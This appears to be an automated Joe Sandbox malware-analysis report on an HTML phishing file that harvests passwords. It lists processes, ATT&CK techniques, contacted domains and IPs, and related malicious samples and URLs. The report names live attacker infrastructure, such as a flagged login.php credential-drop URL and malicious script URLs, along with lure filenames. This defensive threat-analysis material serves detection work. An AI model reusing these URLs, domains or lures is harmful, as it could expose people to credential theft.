Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --string-annotations=is-enterprise-managed=no --field-trial-handle=5124,i,17513973682476257831,12935232604443765362,262144 --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=6008 /prefetch:12	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --string-annotations=is-enterprise-managed=no --field-trial-handle=4308,i,17513973682476257831,12935232604443765362,262144 --variations-seed-version=20250129-180207.876000 --mojo-platform-channel-handle=1652 /prefetch:14	Jump to behavior

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm

HTTP Parser: file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://pxvbtech.store/xtk/xls/x1t2k.js	100%	Avira URL Cloud	malware
https://linxcoded.store/start/xls/includes/css6.css	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	0%	Avira URL Cloud	safe
https://pxvbtech.store/xtk/xls/login.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
pxvbtech.store	63.250.38.198	true	false	high
code.jquery.com	151.101.130.137	true	false	high
www.google.com	142.250.186.100	true	false	high
api.ipify.org	104.26.12.205	true	false	high
onedscolprdeus15.eastus.cloudapp.azure.com	20.42.73.28	true	false	high
server1.linxcoded.store	185.174.100.76	true	false	unknown
linxcoded.store	162.0.229.203	true	false	high
s-part-0032.t-0009.t-msedge.net	13.107.246.60	true	false	high
ipv4.imgur.map.fastly.net	199.232.196.193	true	false	high
_8162._https.server1.linxcoded.store	unknown	unknown	false	unknown
browser.events.data.msn.cn	unknown	unknown	false	high
i.imgur.com	unknown	unknown	false	high
206.23.85.13.in-addr.arpa	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://browser.events.data.msn.cn/OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1740446390074&w=0&anoncknm=al_app_anon&NoResponseBody=true	false		high
https://linxcoded.store/start/xls/includes/css6.css	false	Avira URL Cloud: safe	unknown
https://i.imgur.com/0HdPsKK.png	false		high
file:///C:/Users/user/Desktop/Play_VM-Now_offshorerenewablesVWAV.htm	true	Avira URL Cloud: safe	unknown
https://pxvbtech.store/xtk/xls/login.php	true	Avira URL Cloud: malware	unknown
https://i.imgur.com/KAb5SEy.png	false		high
https://pxvbtech.store/xtk/xls/x1t2k.js	true	Avira URL Cloud: malware	unknown
https://code.jquery.com/jquery-3.1.1.min.js	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://github.com/twbs/bootstrap/blob/master/LICENSE)	chromecache_76.1.dr	false	high
https://getbootstrap.com)	chromecache_76.1.dr	false	high
https://api.ipify.org?format=json	chromecache_81.1.dr, chromecache_78.1.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
199.232.196.193	ipv4.imgur.map.fastly.net	United States	54113	FASTLYUS	false
151.101.130.137	code.jquery.com	United States	54113	FASTLYUS	false
185.174.100.76	server1.linxcoded.store	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
216.58.206.68	unknown	United States	15169	GOOGLEUS	false
63.250.38.198	pxvbtech.store	United States	22612	NAMECHEAP-NETUS	false
162.0.229.203	linxcoded.store	Canada	22612	NAMECHEAP-NETUS	false
142.250.186.100	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.24

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1623209
Start date and time:	2025-02-25 02:18:59 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Play_VM-Now_offshorerenewablesVWAV.htm
Detection:	MAL
Classification:	mal96.phis.winHTM@24/26@26/9
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .htm

Warnings

Exclude process from analysis (whitelisted): SystemSettingsBroker.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.142, 142.250.184.195, 142.250.185.78, 74.125.133.84, 216.58.206.46, 172.217.23.110, 172.217.16.202, 142.250.184.238, 142.250.185.170, 142.250.184.202, 142.250.186.74, 172.217.18.106, 142.250.185.106, 216.58.212.138, 142.250.185.202, 142.250.181.234, 142.250.185.234, 172.217.23.106, 142.250.185.74, 142.250.185.138, 142.250.186.170, 216.58.206.74, 142.250.186.42, 199.232.214.172, 142.250.186.110, 142.250.185.238, 142.250.186.106, 172.217.16.138, 216.58.206.42, 142.250.186.138, 142.250.184.234, 172.217.16.206, 142.250.181.227, 142.250.184.206, 13.107.246.60, 20.109.210.53, 13.85.23.206, 20.12.23.50
Excluded domains from analysis (whitelisted): clients1.google.com, accounts.google.com, slscr.update.microsoft.com, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, www.googleapis.com, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, c.pki.goog, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	wEY98gM1Jj.ps1	Get hash	malicious	LummaC Stealer	Browse	api.ipify.org/
	oNvY66Z8jp.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Pmw24ExIdx.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
	DeepLauncher.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	[Huawei] Contract for YouTube partners.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	NexoPack Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	NexoPack Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	lO5lV39HDj.exe	Get hash	malicious	DarkTortilla, Quasar	Browse	api.ipify.org/
	SpacesVoid Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	55ryoipjfdr.exe	Get hash	malicious	Trickbot	Browse	api.ipify.org/
199.232.196.193	Final Contract.htm	Get hash	malicious	HTMLPhisher	Browse
	https://1drv.ms/w/c/ce0aa4089a0cf823/IQQ-p_-u_0bbTp7ALMPgaKOzAZ_aMu35BXGkFN3emxCDEwQ	Get hash	malicious	HTMLPhisher	Browse
	http://yesincs.com	Get hash	malicious	Unknown	Browse
	https://carrefouriramadan.pages.dev/kuwit	Get hash	malicious	Unknown	Browse
	http://newkrpromo.ru/	Get hash	malicious	HTMLPhisher, Telegram Phisher	Browse
	https://steamcommunttiy.com/activation=Tvc2Fh12mw1	Get hash	malicious	Unknown	Browse
	https://steamescommnunity.com/s/10429109537	Get hash	malicious	Unknown	Browse
	https://notifications.google.com/g/p/ANiao5rdjmKDR8JzehcAm6SkEomHyUC9FcOJcLaNAljVsTh_7y7GPHabSUxjarmclBuNUOroPWAEevR_J8SHFG4A0r7ZjB9DO_wG3FKCGK3dnoeR_KDPpklJRFBsEWgvb_vtwzfPefraHWyONYTBlbPANZelBDXqtgdr73yy_Xuk5rUXAgTZ8QJkulDNKBkK64JgvThc7IxOJ7UIaTA	Get hash	malicious	Unknown	Browse
	http://steamcommunity-cash.com/gift/id=572931441	Get hash	malicious	Unknown	Browse
	Final Call Smart Manufacturing Excellence Munich (196Mo).msg	Get hash	malicious	Unknown	Browse
151.101.130.137	http://mi-outlook-loggin.click/icloud2022-esp.php	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://imaps-support.us/icloud2022-esp.php	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://facebooksecurity.blogspot.ch/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AING.shalominternationalministry.com/index.xml%23?email=amFtZXMubGVhZGJlYXRlckBsb2dpY2FsaXMuY29t	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-3.3.1.min.js
	http://site9613885.92.webydo.com/?v=1	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.2.min.js

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
onedscolprdeus15.eastus.cloudapp.azure.com	Rapport TFEC.xls	Get hash	malicious	Unknown	Browse	20.42.73.28
pxvbtech.store	Play_VM-Now_menglandVWAV.htm	Get hash	malicious	Unknown	Browse	63.250.38.198
s-part-0032.t-0009.t-msedge.net	https://outward-sending.duckdns.org?/!_:FeR2DjX69CZcxap%60~/k8dKQv52KXoS5mhLNPT3/bGliYnkua2VhdGluZ0AxMzR0b3cuY29tLmF1	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	fileDoc-Review_Jim Brown.pdf	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	kB5gXPtkC8.exe	Get hash	malicious	Quasar	Browse	13.107.246.60
	https://views.syd1.cdn.digitaloceanspaces.com/view_docs/newstatement/vewinv88/sffrts/pending-docs.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	AAMA.xlsx	Get hash	malicious	Gabagool	Browse	13.107.246.60
	https://nam.safelink.emails.azure.net/redirect/?destination=https%3A%2F%2Fportal.partner.microsoftonline.cn%2FAdminPortal%2FHome%3Fref%3Dbilloverview%2Finvoice-list%26source%3Dtcemail%23%2Fhomepage&p=bT0zMGQxN2EwYi1iNTQ4LTQ3NDUtYjQyYS0xMTVkOTE1ZGM0Zjcmcz0wMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDAmdT1hZW8mbD1Ib21l	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.32445.25122.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.60
	SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.32445.25122.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.60
	https://www.mediafire.com/file_premium/gvsjycs9mnhqpli/Tristan_Cardinal_Proposal.pdf/file	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	Microsoft subscription purchase confirmation.eml	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
linxcoded.store	Play_VM-Now_menglandVWAV.htm	Get hash	malicious	Unknown	Browse	162.0.229.203
linxcoded.store	SecureVM#700387.htm	Get hash	malicious	HtmlDropper	Browse	162.0.229.203
code.jquery.com	Play_VMSG.docx	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	https://outward-sending.duckdns.org?/!_:FeR2DjX69CZcxap%60~/k8dKQv52KXoS5mhLNPT3/bGliYnkua2VhdGluZ0AxMzR0b3cuY29tLmF1	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	Play_VM-Now_menglandVWAV.htm	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://upwork.confirmation-payment.com/51713588	Get hash	malicious	Unknown	Browse	151.101.130.137
	https://upwork.confirmation-payment.com/51713588	Get hash	malicious	Unknown	Browse	151.101.66.137
	New Sharefile - peRd9Y.svg	Get hash	malicious	Phisher	Browse	151.101.130.137
	https://document-234253ae.document360.io/docs/1003847	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.194.137
	https://document-234253ae.document360.io/docs/1003847	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.2.137
	https://document-234253ae.document360.io/docs/1003847	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.194.137
	https://8vUP.cyxvdztz.ru/IApFuH/	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.2.137
api.ipify.org	h5tjqdvOw8.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	AAMA.xlsx	Get hash	malicious	Gabagool	Browse	104.26.13.205
	https://1drv.ms/f/c/7e8c295f432cb874/Etstr3q-BCJJsWYCnC1MaZcBuM1vCXZ0QOJVViCpE5tBCg?e=8f6crW	Get hash	malicious	Gabagool	Browse	104.26.12.205
	EXTERNAL FW Complete Settlement Agreement Approved Monday February 24 2025.msg	Get hash	malicious	Gabagool, HTMLPhisher	Browse	172.67.74.152
	https://dl.dropboxusercontent.com/scl/fi/q6b8v43zm2qef4eevt1kv/itaou_ddos_client.zip?rlkey=1exycqq44csr7p13g7tvcjudm&st=eyla04ly&dl=0	Get hash	malicious	Unknown	Browse	104.26.12.205
	C-HAWK V075 PARTICULARS.pdf.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	SALT CARRIER 1 - SHIP's Particulars (0).docx.scr.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	MV HAI DUONG 09 - 1- Registry Cert.xlsx.bat.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	DISCORD BIRTHDAY NITRO CLAIMER.exe	Get hash	malicious	Discord Token Stealer	Browse	104.26.12.205
	BUenB12U2a.exe	Get hash	malicious	NetSupport RAT	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://shorten.is/@viewnow4571953	Get hash	malicious	Unknown	Browse	104.26.0.100
	Play_VMSG.docx	Get hash	malicious	HTMLPhisher	Browse	172.67.145.131
	susemail.pdf	Get hash	malicious	Unknown	Browse	162.159.61.3
	https://outward-sending.duckdns.org?/!_:FeR2DjX69CZcxap%60~/k8dKQv52KXoS5mhLNPT3/bGliYnkua2VhdGluZ0AxMzR0b3cuY29tLmF1	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	ffmpeg.dll.dll	Get hash	malicious	RHADAMANTHYS	Browse	104.26.13.205
	RFQ R2100131125.pdf.scr.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.96.1
	https://upwork.confirmation-payment.com/51713588	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://upwork.confirmation-payment.com/51713588	Get hash	malicious	Unknown	Browse	104.17.25.14
	New Sharefile - peRd9Y.svg	Get hash	malicious	Phisher	Browse	1.1.1.1
	h5tjqdvOw8.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
NAMECHEAP-NETUS	Play_VM-Now_menglandVWAV.htm	Get hash	malicious	Unknown	Browse	162.0.229.203
	https://app.salesforceiq.com/r?target=636002902bdf641510717ab9&t=AFwhZf3SXIgd08cZAWD5OPwHoSyVe7Yqvuli_CQj7RH_wa3x9eZCWnq9EQ4U2xhTHrjnzB4ue9Uew9uZA-YxvKJpXXLbShVc3q2LUVV5SrIA3h03HQYEIJ72Pj2kCUgAs5ylpf66-i95&url=https://buzzengine.co.uk/dayo/daqeen/federico.bertin@modula.com	Get hash	malicious	HTMLPhisher	Browse	198.187.29.30
	Rspot.ps1	Get hash	malicious	FormBook	Browse	68.65.122.71
	https://t.yesware.com/tt/a7af9f054087edb7fe11004aae076a670f6f25bc/c08496eb15611fb326fc7f8cd419ccef/b27dee5433a19413c058ca3f6274db90/celtus-tarllk-lokjuys.us-mia-1.linodeobjects.com/b5.html#YmVudG9uQDNwZ2Fkdmlzb3JzLmNvbQ==	Get hash	malicious	Unknown	Browse	68.65.122.76
	https://1drv.ms/w/c/ce0aa4089a0cf823/IQQ-p_-u_0bbTp7ALMPgaKOzAZ_aMu35BXGkFN3emxCDEwQ	Get hash	malicious	HTMLPhisher	Browse	162.0.235.245
	Remittance A.pdf	Get hash	malicious	Unknown	Browse	198.187.29.30
	https://storage.googleapis.com/arctic-carving-450917-d9.appspot.com/Vac.html#xxxx@gmail.com	Get hash	malicious	HTMLPhisher	Browse	198.54.115.120
	https://storage.googleapis.com/arctic-carving-450917-d9.appspot.com/Vac.html	Get hash	malicious	HTMLPhisher	Browse	198.54.115.120
	Bwhite_2025_Benefit_Distribution_3790.pdf	Get hash	malicious	EvilProxy, Fake Captcha, HTMLPhisher	Browse	162.0.228.199
	https://fantasy-uncovered-leader.glitch.me/segbn.html	Get hash	malicious	Unknown	Browse	198.54.115.189
FASTLYUS	Play_VMSG.docx	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	susemail.pdf	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://outward-sending.duckdns.org?/!_:FeR2DjX69CZcxap%60~/k8dKQv52KXoS5mhLNPT3/bGliYnkua2VhdGluZ0AxMzR0b3cuY29tLmF1	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	Play_VM-Now_menglandVWAV.htm	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://upwork.confirmation-payment.com/51713588	Get hash	malicious	Unknown	Browse	151.101.130.137
	https://upwork.confirmation-payment.com/51713588	Get hash	malicious	Unknown	Browse	151.101.66.137
	New Sharefile - peRd9Y.svg	Get hash	malicious	Phisher	Browse	151.101.130.137
	https://document-234253ae.document360.io/docs/1003847	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.2.132
	https://document-234253ae.document360.io/docs/1003847	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.194.132
	https://document-234253ae.document360.io/docs/1003847	Get hash	malicious	Unknown	Browse	151.101.2.132
FASTLYUS	Play_VMSG.docx	Get hash	malicious	HTMLPhisher	Browse	151.101.130.137
	susemail.pdf	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://outward-sending.duckdns.org?/!_:FeR2DjX69CZcxap%60~/k8dKQv52KXoS5mhLNPT3/bGliYnkua2VhdGluZ0AxMzR0b3cuY29tLmF1	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	Play_VM-Now_menglandVWAV.htm	Get hash	malicious	Unknown	Browse	151.101.194.137
	https://upwork.confirmation-payment.com/51713588	Get hash	malicious	Unknown	Browse	151.101.130.137
	https://upwork.confirmation-payment.com/51713588	Get hash	malicious	Unknown	Browse	151.101.66.137
	New Sharefile - peRd9Y.svg	Get hash	malicious	Phisher	Browse	151.101.130.137
	https://document-234253ae.document360.io/docs/1003847	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.2.132
	https://document-234253ae.document360.io/docs/1003847	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	151.101.194.132
	https://document-234253ae.document360.io/docs/1003847	Get hash	malicious	Unknown	Browse	151.101.2.132
ASN-QUADRANET-GLOBALUS	res.x86.elf	Get hash	malicious	Unknown	Browse	146.71.41.225
	mips.elf	Get hash	malicious	Mirai, Moobot	Browse	66.154.121.109
	http://111.sharpsites%5B.%5Dorg%5B.%5Duk/?png=LE0@@QDh/HxZFLz9MQGg6T0YmQTxJZEA/&x=/nKXdh/%23YWtuYXBwQHBhcmtlci5jb20=%22%3C/script	Get hash	malicious	Unknown	Browse	45.61.161.8
	http://111.sharpsites.org.uk/?png=LE0@@QDh/HxZFLz9MQGg6T0YmQTxJZEA/&x=/nKXdh/%23YWtuYXBwQHBhcmtlci5jb20=%22%3C/script	Get hash	malicious	HTMLPhisher	Browse	45.61.161.8
	HDFC PAYMENT.bat	Get hash	malicious	Unknown	Browse	147.78.241.56
	SecuriteInfo.com.Win32.MalwareX-gen.30885.10239.exe	Get hash	malicious	Remcos	Browse	45.61.166.182
	Comprobante transferencia 5678373888272653688262553.exe	Get hash	malicious	DarkCloud	Browse	204.44.192.90
	play.wav.htm	Get hash	malicious	HtmlDropper	Browse	185.174.100.76
	Hilix.mpsl.elf	Get hash	malicious	Mirai	Browse	45.199.228.244
	garm6.elf	Get hash	malicious	Unknown	Browse	103.214.71.8

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	dropped
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

File type:	HTML document, ASCII text, with very long lines (64762), with CRLF line terminators
Entropy (8bit):	5.697636563998656
TrID:	HyperText Markup Language (15015/1) 30.02% HyperText Markup Language (12001/1) 23.99% HyperText Markup Language (12001/1) 23.99% HyperText Markup Language (11001/1) 21.99%
File name:	Play_VM-Now_offshorerenewablesVWAV.htm
File size:	113'809 bytes
MD5:	1d3ec5c869a3f157228eed9fde99db4c
SHA1:	adc76c70a4edc83a9b1ab5bcd028ff2f208f8b69
SHA256:	709a3198b91a744609f39cdac7e287edc4f5f69fbc0ee59db8c7b058c7b86038
SHA512:	a0a56bf12d707d5434f9cb59dbce785e72a0c22edf1bf861802ad3317889592690eedc088ac726388b50d8daae2b0a8b53a4cd4f8684f3a5037278da9896ec8d
SSDEEP:	3072:wLcr3yRl+R0bRFQf7stbrIrd5wzI41tjm87uj+Dg0i7ny1fw:wQr3yb+R0bRFQf7stbrIrd5wzDJmyuj3
TLSH:	8DB36CB29A53EBB74C001A94B6C0C7027642628FD62FA77D31CCD56F52A4B86D4CC6F9
File Content Preview:	<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <style>.. /* BrQGSVpmixBdrnK /.. { margin: 0; padding: 0; box-sizing: border-box; }.. body, html { width: 100%; height: 100%; }.. </style>.. <script>.

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2025 02:19:50.820158958 CET	64897	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:19:50.853657007 CET	53	64897	1.1.1.1	192.168.2.24
Feb 25, 2025 02:19:57.834204912 CET	53	55159	1.1.1.1	192.168.2.24
Feb 25, 2025 02:19:57.955938101 CET	52769	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:19:57.956197023 CET	50598	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:19:57.963064909 CET	53	62755	1.1.1.1	192.168.2.24
Feb 25, 2025 02:19:57.969410896 CET	53	50598	1.1.1.1	192.168.2.24
Feb 25, 2025 02:19:57.971857071 CET	53	52769	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:00.313390970 CET	53	52961	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:00.320039988 CET	54910	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:00.320183992 CET	55860	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:00.335436106 CET	53	54910	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:00.340800047 CET	53	55860	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:00.431938887 CET	62260	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:00.432120085 CET	52996	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:00.445142984 CET	53	62260	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:00.464315891 CET	53	52996	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:01.460519075 CET	52324	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:01.460755110 CET	63764	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:01.467658043 CET	53	52324	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:01.468041897 CET	53	63764	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:01.883289099 CET	53	64081	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:03.353979111 CET	53134	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:03.354115963 CET	63267	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:03.356340885 CET	53	54514	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:03.361195087 CET	53	63267	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:03.361380100 CET	53	53134	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:04.391228914 CET	61236	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:04.391395092 CET	63651	53	192.168.2.24	1.1.1.1
Feb 25, 2025 02:20:04.398408890 CET	53	63651	1.1.1.1	192.168.2.24
Feb 25, 2025 02:20:04.398591995 CET	53	61236	1.1.1.1	192.168.2.24
